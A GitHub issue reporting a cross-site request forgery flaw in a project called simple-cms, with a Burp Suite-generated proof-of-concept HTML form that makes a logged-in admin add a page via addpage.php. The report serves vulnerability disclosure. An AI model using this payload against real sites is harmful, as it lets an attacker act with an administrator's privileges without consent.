Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

simple-cms has Cross-site request forgery #3

Open
SunJ3t opened this issue Aug 8, 2018 · 0 comments
Open

simple-cms has Cross-site request forgery #3

SunJ3t opened this issue Aug 8, 2018 · 0 comments

Comments

@SunJ3t
Copy link

SunJ3t commented Aug 8, 2018

http://192.168.2.129/simple/admin/

I can add page when admin click the html file.

payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.2.129/simple/admin/addpage.php" method="POST">
      <input type="hidden" name="pageTitle" value="csrftest" />
      <input type="hidden" name="pageCont" value="csrftest" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant